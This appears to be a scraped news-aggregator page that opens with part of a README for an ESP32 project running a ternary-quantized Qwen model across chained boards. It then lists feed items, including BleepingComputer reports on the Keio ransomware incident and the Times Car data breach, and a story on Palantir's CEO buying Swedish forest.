│    • RMSNorm (FP16 scaled to FP32)                      │
│    • 1.58-bit Attention (Q, K, V, O proj) + RoPE        │
│    • KV Cache (PSRAM)                                   │
│    • 1.58-bit MLP (Gate, Up, Down proj)                 │
│                                                         │
│             (SPI CH A - TX to Node 2)                   │
└───────────────────────┬─────────────────────────────────┘
                        │
                       ... (Nodes 2 to 5)
                        │
                        ▼
┌─────────────────────────────────────────────────────────┐
│                    COMPUTE NODE 6                       │
│             (SPI CH B - RX from Node 5)                 │
│                                                         │
│  ► Layer 20 to 23 (4x Transformer Blocks)               │
│    • Same 1.58-bit Architecture                         │
│                                                         │
│             (SPI CH A - TX back to Master)              │
└───────────────────────┬─────────────────────────────────┘
                        │
                        ▼
┌─────────────────────────────────────────────────────────┐
│                     MASTER NODE                         │
│             (SPI CH B - RX from Node 6)                 │
│                                                         │
│                 Final RMS Norm                          │
│             (FP16, 64KB in 'fnorm' partition)           │
│                       │                                 │
│         LM Head (Tied to INT4 Embeddings)               │
│                       │                                 │
│               Greedy Sampling                           │
│                       │                                 │
│  [ Output ] <--- Next Token ID                          │
└─────────────────────────────────────────────────────────┘

Getting Started

pls refer workflow guide to start with the project.

Project Structure

.
├── README.md                   # Project documentation
├── workflow.md                 # Step-by-step flashing, model prep & wiring guide
├── .gitignore                  # Git ignore rules for build files & binaries
│
├── docs/                       
│   └── images/                 # Architecture diagrams and hardware photos
│
├── master_board/               # Firmware for the Master Node (ESP-IDF)
│   ├── main/
│   │   ├── main.cpp            # Master orchestrator, user I/O & BPE tokenizer
│   │   ├── embedding.cpp       # INT4 embedding lookup logic
│   │   ├── lm_head.cpp         # LM Head mapping and greedy sampling
│   │   └── spi_bus.cpp         # Master dual-channel SPI driver
│   ├── partitions.csv          # Custom partition table (token, model, fnorm)
│   └── CMakeLists.txt
│
├── node_firmware/              # Firmware for the Compute Nodes (ESP-IDF)
│   ├── main/
│   │   ├── main.cpp            # Node worker entry point & inference loop
│   │   ├── bitlinear.cpp       # 1.58-bit ternary linear layer implementation
│   │   ├── bitlinear_forward.S # Assembly optimized MAC ops for 1.58-bit
│   │   ├── qwen_attention.cpp  # Qwen Attention, RoPE & KV-Cache runtime
│   │   ├── lut_table.cpp       # Look-up tables for extreme optimization
│   │   └── spi_bus.cpp         # Daisy-chain SPI DMA receiver/transmitter
│   ├── partitions.csv          # Layer partition layout for Node
│   └── CMakeLists.txt
│
├── python_tools/               # PC-side quantization & preprocessing suite
    ├── crop_token.py           # Vocabulary pruning (scales down to 32K tokens)
    ├── crop_model_weight.py    # Embedding matrix slicing
    ├── qat_158.py              # BitNet QAT (Quantization-Aware Training) fine-tuning
    ├── bit4_embedding.py       # INT4 weight packer for embeddings
    ├── pack_tokenizer_bin.py   # Serializes tokenizer rules into ESP32 .bin
    ├── pack_model_bin.py       # Packs 1.58-bit layer chunks for physical alignment
    ├── look_model_structure.py # Debug tool for inspecting .safetensors
    └── flash_*.bat             # Multi-threaded fast flashing scripts

License

This project is licensed under the MIT License - see the LICENSE file for details.

Acknowledgments

Inspiration, related works, and references:

Deutsche Bahn "joke" is no longer funny

Hacker News
jonworth.eu
2026-09-28 17:21:50
Comments...

Japan's Keio confirms ransomware attack disrupted business systems

Bleeping Computer
www.bleepingcomputer.com
2026-09-28 16:56:47
Keio Corporation (Keio), a major private railway operator in Japan, said its network was hit by a ransomware attack over the weekend, disrupting  some of its business systems. [...]...
Original Article

Japan's Keio confirms ransomware attack disrupted business systems

Keio Corporation (Keio), a major private railway operator in Japan, said its network was hit by a ransomware attack over the weekend, disrupting  some of its business systems.

Following a system failure in the early hours of Saturday, the company confirmed the attack and shut down its network to prevent additional damage.

The company said it is investigating the extent of the impact and whether the attackers accessed any customer or business partner information.

Keio is a large Japanese railway operator with 85 km of track and 69 stations, as well as a separate hospitality business of 25 hotels. The company has over 2,200 employees and a reported annual revenue of about $2.6 billion.

“In the early hours of September 26, 2026, we confirmed a ransomware attack on our group's servers. We have reported the incident to the police and are conducting an investigation into the attack's route and damage with the cooperation of external experts,” Keio says .

The incident appears to have affected only the hospitality side of Keio’s business, not train operations.

A separate announcement published on the company’s Keio Plaza Hotel Tokyo website is warning of possible delays on some customer-facing services.

Local media outlets have reported that the cyberattack disrupted the firm's payment systems .

At the time of writing, BleepingComputer could not find a ransomware group claiming the attack on Keio.

BleepingComputer has contacted the company to request more information about the incident, and we will update this post with their response once it reaches us.

Tokyo Metro has also disclosed a cyber incident over the weekend in which attackers gained unauthorized access to its systems and accessed 59,000 member email addresses.

Although both Keio and Tokyo Metro are Japanese railway operators, it is unclear if the organizations were targeted in a coordinated campaign by the same threat actor.

Tokyo Metro is a major transit operator that runs nine subway lines covering 195 km and 180 stations, carrying an average of 7 million passengers daily .

The company said the breached systems contained only email addresses and that it has already identified and closed the security weakness the attackers used in this case.

article image

Build your security blueprint for AI-powered attacks

Join Mikko Hyppönen and security leaders from the NFL, CHANEL, and Atlassian for a two-hour digital summit on what AI-speed attacks change, what defenders should stop doing, and how to validate, decide, fix, and re-validate at machine speed.

Save your seat

Palantir founder purchases large swath of forest in Sweden

Hacker News
www.arctictoday.com
2026-09-28 16:51:47
Comments...
Original Article
Palantir Chief Executive Officer Alex Karp speaks at the G20 Innovation Ministerial summit, in Chapel Hill, North Carolina, U.S., September 2, 2026. REUTERS/Jonathan Drake

Alex Karp, CEO of Palantir Technologies, purchased 15,000 hectares (37,000 acres) of forest in Härjedalen, Sweden, for 235 million kronor ($22 million). For comparison, Liechtenstein covers an area of about 16,000 hectares.

The purchase from paper company SCA AB became public when local hunters received cancellation of their lease to hunt on the property, according to Tidningen Härjedalen. Local authorities were given no advance information about the transaction.

Karp made the purchase through his newly registered company Cladonia Skog AB. The chairman of Cladonia told the Swedish newspaper that the land provides valuable habitat for wildlife and space for recreation.

Swedish defense and police use services from Palatir, as does NATO. The purchase comes at a time when European leaders are considering reducing their reliance on U.S. technology.

Pacing the Frontier is not the actual goal for AI labs

Hacker News
www.lesswrong.com
2026-09-28 16:47:26
Comments...
Original Article

x

Pacing the Frontier is not the actual goal for AI labs — LessWrong

State of the (Tagged) Union Address by Andrew Kelley

Lobsters
www.youtube.com
2026-09-28 16:35:51
Comments...

Times Car confirms data breach affecting 6.6 million user accounts

Bleeping Computer
www.bleepingcomputer.com
2026-09-28 16:31:16
Japanese car-sharing service Times Car has confirmed that approximately 6.6 million user accounts were compromised in a cyberattack disclosed late last week. [...]...
Original Article

Times Car confirms data breach affecting 6.6 million user accounts

Japanese car-sharing service Times Car has confirmed that approximately 6.6 million user accounts were compromised in a cyberattack disclosed late last week.

The company announced the incident on September 25, saying that a third party had accessed its systems at the beginning of the month. Times Car took action to block the unauthorized access on September 26.

At the time, the company said it was investigating whether the attackers accessed members' personal information, but confirmed the data theft in an update earlier today .

The company says that the intrusion affects 6.6 million current and former Times Car members, and also current and former members of the Times Business Service corporate account program.

According to the update, exposed information includes the following data:

  • Full name
  • Department name for corporate members
  • Physical address
  • Date of birth
  • Telephone number
  • Email address
  • Driver’s license information
  • Identity verification document information, such as images of driver’s licenses
  • Account password
  • Linked service IDs

The company said that passwords were stored in “a form that cannot be restored,” suggesting they were encrypted or hashed, although it did not provide additional details.

The investigation confirmed that credit card information remained unaffected. Currently, there is no evidence that the stolen data has been distributed online.

Times Car is a major vehicle rental and mobility service operated by Times Mobility, part of the Park24 Group.

It’s a large business with a claimed 4 million active members as of August 2026, allowing online reservations for 84,000 vehicles and collecting them from one of the 29,000 stations it operates across all 47 Japanese prefectures.

The company urged members to be cautious about emails, SMS, and phone calls claiming to come from Times Car, and to avoid opening attachments or typing passwords and credit card details.

The firm is now conducting a forensic investigation into the cause and scope of the incident with the help of an external expert.

Times Car said it would notify affected customers individually, but the notifications would be sent in stages.

Despite the cybersecurity incident, the company assured that all its services continue to operate as normal.

article image

Build your security blueprint for AI-powered attacks

Join Mikko Hyppönen and security leaders from the NFL, CHANEL, and Atlassian for a two-hour digital summit on what AI-speed attacks change, what defenders should stop doing, and how to validate, decide, fix, and re-validate at machine speed.

Save your seat